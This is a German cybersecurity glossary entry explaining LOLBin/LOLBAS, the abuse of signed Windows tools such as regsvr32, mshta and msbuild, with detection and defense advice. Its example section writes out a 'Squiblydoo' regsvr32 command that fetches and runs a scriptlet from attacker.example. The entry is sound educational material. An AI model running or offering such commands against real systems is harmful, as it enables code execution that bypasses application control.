LOLBin / LOLBAS
Was ist LOLBin / LOLBAS?
LOLBin / LOLBASSigniertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht.
LOLBin (Living-Off-the-Land Binary) und das umfassendere LOLBAS-Projekt (Living-Off-the-Land Binaries And Scripts) katalogisieren von Microsoft signierte Binaries, Skripte und Bibliotheken, deren Nebenwirkungen sich offensiv nutzen lassen, etwa zum Ausfuehren beliebigen Codes, Nachladen von Payloads oder Umgehen von Application Control. Typische Beispiele sind rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe und certutil.exe. Da diese Tools signiert und vertrauenswuerdig sind, hilft Hash-Blocklisting nicht; man muss erwartete von anomalen Kommandozeilen unterscheiden. LOLBAS untermauert viele Execution- und Defense-Evasion-Techniken in MITRE ATT&CK. Schutz: Application Allowlisting, ScriptBlock- und Prozess-Logging, ASR-Regeln, EDR-Verhaltensanalyse.
● Beispiele
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml fuer inline C# ohne Festplatten-Drop.
● Häufige Fragen
Was ist LOLBin / LOLBAS?
Signiertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet LOLBin / LOLBAS?
Signiertes Systembinary oder Skript (LOLBin/LOLBAS), das Angreifer fuer Ausfuehrung, Download, Persistenz oder Umgehung von Schutzmechanismen missbrauchen, waehrend es wie ein legitimes Admin-Tool aussieht.
Wie funktioniert LOLBin / LOLBAS?
LOLBin (Living-Off-the-Land Binary) und das umfassendere LOLBAS-Projekt (Living-Off-the-Land Binaries And Scripts) katalogisieren von Microsoft signierte Binaries, Skripte und Bibliotheken, deren Nebenwirkungen sich offensiv nutzen lassen, etwa zum Ausfuehren beliebigen Codes, Nachladen von Payloads oder Umgehen von Application Control. Typische Beispiele sind rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe und certutil.exe. Da diese Tools signiert und vertrauenswuerdig sind, hilft Hash-Blocklisting nicht; man muss erwartete von anomalen Kommandozeilen unterscheiden. LOLBAS untermauert viele Execution- und Defense-Evasion-Techniken in MITRE ATT&CK. Schutz: Application Allowlisting, ScriptBlock- und Prozess-Logging, ASR-Regeln, EDR-Verhaltensanalyse.
Wie schützt man sich gegen LOLBin / LOLBAS?
Schutzmaßnahmen gegen LOLBin / LOLBAS kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für LOLBin / LOLBAS?
Übliche alternative Bezeichnungen: LOLBAS, Living-off-the-Land-Binary.
● Verwandte Begriffe
- attacks№ 616
Living off the Land
Angriffsstil, bei dem Angreifer legitime, vorinstallierte Tools und Skripte des Opfersystems missbrauchen, statt eigene Malware abzulegen.
- malware№ 417
Dateilose Malware
Schadsoftware, die hauptsächlich im Arbeitsspeicher läuft und vertrauenswürdige Systemwerkzeuge nutzt, ohne klassische ausführbare Dateien auf der Festplatte.
- defense-ops№ 298
Defense Evasion
MITRE-ATT&CK-Taktik (TA0005), die Techniken zum Umgehen von Erkennung, Deaktivieren von Sicherheitswerkzeugen und Verbergen der Aktivität auf einem Zielsystem bündelt.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
Endpoint-Sicherheitstechnologie, die fortlaufend Prozess-, Datei-, Registry- und Netzwerkaktivitäten aufzeichnet, um Bedrohungen auf Hosts zu erkennen, zu untersuchen und darauf zu reagieren.
- defense-ops№ 682
Mimikatz
Ein Open-Source-Windows-Post-Exploitation-Tool, das Klartext-Passwoerter, Hashes, Kerberos-Tickets und weitere Credentials aus dem Speicher und aus LSASS extrahiert.
- attacks№ 045
AMSI-Bypass
Techniken, die das Windows Antimalware Scan Interface deaktivieren, patchen oder umgehen, sodass Skripte und In-Memory-Payloads nicht von Antivirenprodukten gescannt werden.